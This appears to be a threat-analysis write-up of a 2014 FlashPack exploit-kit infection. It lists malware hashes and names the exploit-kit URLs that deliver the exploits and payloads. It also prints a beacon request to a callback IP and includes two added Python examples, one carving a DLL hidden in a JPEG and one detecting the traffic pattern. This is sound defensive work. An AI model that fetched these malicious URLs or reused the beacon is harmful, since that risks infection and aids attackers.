2014-03-29 - FLASHPACK EK

ASSOCIATED FILES:

NOTES:


CHAIN OF EVENTS

ASSOCIATED DOMAINS


.htaccess redirect from the compromised website to the FlashPack EK domain for infection traffic:

After the initial malware is delivered, the traffic goes to adultfriendfinder.com:

Post-infection callback traffic:


PRELIMINARY MALWARE ANALYSIS

JAVA EXPLOIT

File name:  2014-03-29-FlashPack-EK-java-exploit.jar
File size:  9.5 KB ( 9690 bytes )
MD5 hash:  e5c7b0714c4735d4df40d55f9d73cbb1
Detection ratio:  8 / 51
First submission:  2014-03-06 17:37:59 UTC
VirusTotal link:  https://www.virustotal.com/en/file/8e918479fc7a46f45a65d3726eae336a6b6d3c4b9b13906d2dcf7ca96ab2e02d/analysis/


MALWARE PAYLOAD

File name:  2014-03-29-FlashPack-EK-malware-payload.exe
File size:  89.0 KB ( 91175 bytes )
MD5 hash:  a850b4a8dd9bd4477759c03aa35de9a0
Detection ratio:  21 / 51
First submission:  2014-03-29 05:42:03 UTC
VirusTotal link:  https://www.virustotal.com/en/file/1d219ed0fe25096301a7ff01ce6978096664f0f9ce961c2fbd293dd4f22548f9/analysis/
Malwr link:  https://malwr.com/analysis/Yjk3NDBkZTllNzc2NGQzYzkzMWJkMzkzM2YxZWVhNTk/


SECOND EXE SEEN AFTER THE INITIAL INFECTION

File name:  2014-03-29-FlashPack-EK-malware-02.exe
File size:  136.7 KB ( 139958 bytes )
MD5 hash:  bc8a81a2a241b003d3b3f4807c7cfaa5
Detection ratio:  14 / 51
First submission:  2014-03-29 05:42:29 UTC
VirusTotal link:  https://www.virustotal.com/en/file/44866c461b1fcf894f5cb5e05f001a5334b1edff351674ffe2b2f1cb086068e6/analysis/
Malwr link:  https://malwr.com/analysis/ZjNiMGZhOGE3MGUyNDM0NzlmY2ZhYzg2MTE2MTgxMDU/


DLL EXTRACTED FROM JPEG FILE (see below for details)

File name:  sqlrenew.txt
File size:  13.0 KB ( 13312 bytes )
MD5 hash:  fe376ea90c58dbff1c05601b7a323339
Detection ratio:  3 / 51
First submission:  2014-03-29 05:42:56 UTC
VirusTotal link:  https://www.virustotal.com/en/file/176813179ca03068647f035b3bc1fb26cf757980bbdd28134339d4beeefab377/analysis/
Malwr link:  https://malwr.com/analysis/MjEyMDhlM2M2MGM5NDNjYmE5MGE0MGQyZmIyMGU2MGQ/


SNORT EVENTS

SNORT EVENTS FOR THE INFECTION TRAFFIC (from Sguil on Security Onion)


HIGHLIGHTS FROM THE TRAFFIC

Compromised website redirecting a search-engine visitor (.htaccess redirect keyed on the Referer header):


CVE-2014-0322 (Internet Explorer use-after-free, patched in MS14-012) portion of the exploit traffic begins here:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/link2jpg/index.php


For details, see:  Malware Don't Need Coffee's article


Flash helper:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/link2jpg/a6f34.swf


CVE-2014-0322 delivers malware payload:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/loadmsie10.php


Java exploit:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/include/597bb8ffeaf7950c575c540b37bccd29.jar


Java exploit delivers the same malware payload:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/loaddb.php


The CVE-2014-0322 traffic also retrieves this image; it is the JPEG from which the sqlrenew.txt DLL listed above was extracted:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/Erido.jpg

NOTE:  Malware Don't Need Coffee's article already shows this.  I'm just repeating the same information.
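Added example, not code from this write-up or from the article it cites: a Python carver for the case described above, a DLL riding inside a JPEG. How the DLL was stored in Erido.jpg is not stated here, so the code assumes the common arrangement of a PE image appended after the JPEG's EOI marker and optionally XOR-obfuscated with a single byte. It walks the JPEG segments to find the real end of the image (so an FF D9 byte pair inside the appended data cannot fool it), recovers the XOR key from the byte that must decode to the 'M' of the MZ signature, and checks the IMAGE_FILE_DLL flag in the COFF header. The sample JPEG, the PE stub and the key 0x95 are constructed for the example.

```python
import struct

IMAGE_FILE_DLL = 0x2000


def jpeg_end(data):
    """Offset just past the EOI marker, found by walking the JPEG segments.
    Raises ValueError if the data is not a well-formed JPEG."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                                    # EOI: the image ends here
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:  # standalone markers, no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        pos += 2 + struct.unpack_from(">H", data, pos + 2)[0]  # skip the segment by its length
        if marker == 0xDA:                                    # SOS: entropy-coded data follows
            while True:
                nxt = data.find(b"\xff", pos)
                if nxt < 0 or nxt + 1 >= len(data):
                    raise ValueError("truncated scan data")
                if data[nxt + 1] == 0x00 or 0xD0 <= data[nxt + 1] <= 0xD7:  # stuffed byte or RSTn
                    pos = nxt + 2
                    continue
                pos = nxt                                     # a real marker: back to the segment loop
                break
    raise ValueError("no EOI marker")


def looks_like_pe(blob):
    """MZ header whose e_lfanew points at a PE signature with room for the COFF header."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(blob) - 24 and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def is_dll(blob):
    """IMAGE_FILE_HEADER.Characteristics sits 22 bytes past the PE signature."""
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return bool(struct.unpack_from("<H", blob, e_lfanew + 22)[0] & IMAGE_FILE_DLL)


def carve_appended_pe(data):
    """Return (xor_key, pe_bytes, is_dll) for a PE appended after the image, or None.
    Assumes at most a single-byte XOR; the key is whatever turns the first byte into 'M'."""
    tail = data[jpeg_end(data):]
    if len(tail) < 0x40:
        return None
    key = tail[0] ^ 0x4D
    candidate = bytes(b ^ key for b in tail) if key else tail
    if not looks_like_pe(candidate):
        return None
    return key, candidate, is_dll(candidate)


def build_fake_jpeg():
    """Constructed minimal JPEG: SOI, APP0, SOS with a stuffed FF 00 in the scan data, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    return b"\xff\xd8" + app0 + sos + b"\x12\x34\xff\x00\x56" + b"\xff\xd9"


def build_fake_dll():
    """Constructed PE stub: DOS header, PE signature, COFF header flagged as a 32-bit DLL."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x2102)  # i386, 1 section, EXECUTABLE|32BIT|DLL
    return bytes(dos) + b"PE\0\0" + coff


SAMPLE_KEY = 0x95  # arbitrary key chosen for the constructed sample
SAMPLE_JPEG = build_fake_jpeg() + bytes(b ^ SAMPLE_KEY for b in build_fake_dll())

if __name__ == "__main__":
    key, pe, dll = carve_appended_pe(SAMPLE_JPEG)
    print("image ends at %d, xor key 0x%02x, carved %d bytes, DLL flag %s"
          % (jpeg_end(SAMPLE_JPEG), key, len(pe), dll))
```

Run it against a real sample by replacing SAMPLE_JPEG with the file's bytes; if carve_appended_pe returns None the DLL is stored some other way (multi-byte key, inside a segment, or not after EOI at all) and the tail needs to be looked at by hand.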


Different EXE file retrieved after the initial infection:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/software.php?03290020961320170


Callback traffic to 195.191.24.40 over port 19285, with no Host header in the HTTP request:

GET /stat?uid=100&downlink=1111&uplink=1111&id=00035669&statpass=bpass&version=20140325&features=30&guid=231ea33d-3860-4571-a15a-4cda85d1e373&comment=20140325&p=0&s= HTTP/1.0


More callback traffic:  46.165.222.218/
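Added example, not part of the original write-up: a small Python triage script that runs the three observable patterns from this chain over a constructed set of HTTP transactions: the referer-conditional .htaccess redirect (a 3xx to an external host, served only when the visitor arrived from a search engine), the FlashPack URL structure under /codex/admin/ plus the software.php?<digits> fetch, and the /stat? beacon carrying statpass and guid, sent with no Host header to a non-standard port. The EK hostname, URIs, callback IP, port and query string are from the page; the compromised site name, the search query and the benign entries are made up, and the record format is my own rather than any log tool's.

```python
import re
from urllib.parse import urlsplit, parse_qs

EK_HOST = "bkapaep35cp5h47qef1lpgl.fm.gen.tr"

# Referer hosts a malicious .htaccess typically keys on (common search engines).
SEARCH_ENGINE_RE = re.compile(r"(^|\.)(google|bing|yahoo|ask|aol)\.", re.I)
# URL structure seen in this chain: landing page, Flash helper, the two loader
# scripts, the 32-hex-named JAR, the JPEG, and the follow-up software.php?<digits> fetch.
FLASHPACK_PATH_RE = re.compile(
    r"^/codex/admin/(link2jpg/(index\.php|[0-9a-f]+\.swf)|load\w+\.php|include/[0-9a-f]{32}\.jar|\w+\.jpg)$")
SOFTWARE_RE = re.compile(r"^/software\.php\?\d+$")


def tx(dst, uri, port=80, status=200, referer=None, location=None, host=True):
    """Build one transaction record (constructed test data, not a real log format)."""
    headers = {"Host": dst} if host else {}
    if referer:
        headers["Referer"] = referer
    resp = {"Location": location} if location else {}
    return {"dst": dst, "port": port, "method": "GET", "uri": uri,
            "headers": headers, "status": status, "resp_headers": resp}


# Constructed sample in the shape of this infection chain.
SAMPLE_TRAFFIC = [
    # search-engine visitor: the .htaccess answers with a 302 to the EK landing page
    tx("compromised-site.example", "/", status=302,
       referer="http://www.google.com/search?q=something",
       location="http://" + EK_HOST + "/codex/admin/link2jpg/index.php"),
    # the same page with no Referer is served normally, so a direct visit shows nothing
    tx("compromised-site.example", "/"),
    tx(EK_HOST, "/codex/admin/link2jpg/index.php"),
    tx(EK_HOST, "/codex/admin/link2jpg/a6f34.swf"),
    tx(EK_HOST, "/codex/admin/loadmsie10.php"),
    tx(EK_HOST, "/codex/admin/include/597bb8ffeaf7950c575c540b37bccd29.jar"),
    tx(EK_HOST, "/codex/admin/loaddb.php"),
    tx(EK_HOST, "/codex/admin/Erido.jpg"),
    tx(EK_HOST, "/software.php?03290020961320170"),
    # post-infection beacon: no Host header, non-standard port
    tx("195.191.24.40", "/stat?uid=100&downlink=1111&uplink=1111&id=00035669&statpass=bpass"
       "&version=20140325&features=30&guid=231ea33d-3860-4571-a15a-4cda85d1e373"
       "&comment=20140325&p=0&s=", port=19285, host=False),
    tx("www.example.com", "/stat?uid=5"),  # benign lookalike: port 80, Host header, no statpass/guid
]


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def check_search_redirect(t):
    """Flag a 3xx sent to a visitor who arrived from a search engine when the
    Location points at another host: the referer-conditional .htaccess pattern."""
    referer = t["headers"].get("Referer")
    location = t["resp_headers"].get("Location")
    if not (referer and location and 300 <= t["status"] < 400):
        return None
    if not SEARCH_ENGINE_RE.search(host_of(referer)):
        return None
    target = host_of(location)
    own_host = t["headers"].get("Host", t["dst"]).lower()
    return target if target and target != own_host else None


def check_ek_url(t):
    """Match the FlashPack URL structure regardless of the (rotating) host name."""
    if FLASHPACK_PATH_RE.match(t["uri"]) or SOFTWARE_RE.match(t["uri"]):
        return t["dst"] + t["uri"]
    return None


def check_beacon(t):
    """The callback: GET /stat? with statpass and guid, and no Host header and/or an odd port."""
    parts = urlsplit(t["uri"])
    if parts.path != "/stat":
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "statpass" not in params or "guid" not in params:
        return None
    no_host = "Host" not in t["headers"]
    odd_port = t["port"] not in (80, 443, 8080)
    if not (no_host or odd_port):
        return None
    one = lambda k: params.get(k, [""])[0]
    return {"dst": t["dst"], "port": t["port"], "no_host_header": no_host,
            "id": one("id"), "guid": one("guid"), "statpass": one("statpass"), "version": one("version")}


def triage(transactions):
    """Run all three checks and return (tag, detail) pairs in traffic order."""
    hits = []
    for t in transactions:
        for tag, check in (("htaccess_redirect", check_search_redirect),
                           ("flashpack_url", check_ek_url),
                           ("callback", check_beacon)):
            detail = check(t)
            if detail:
                hits.append((tag, detail))
    return hits


if __name__ == "__main__":
    for tag, detail in triage(SAMPLE_TRAFFIC):
        print(tag, detail)
```

The redirect check is the one worth keeping in mind when you verify a compromised site: fetching the page without a search-engine Referer (as the second sample transaction does) returns the normal page, so reproduce the redirect with a Referer set to a search engine before declaring the site clean.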


FINAL NOTES

Once again, here are links for the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
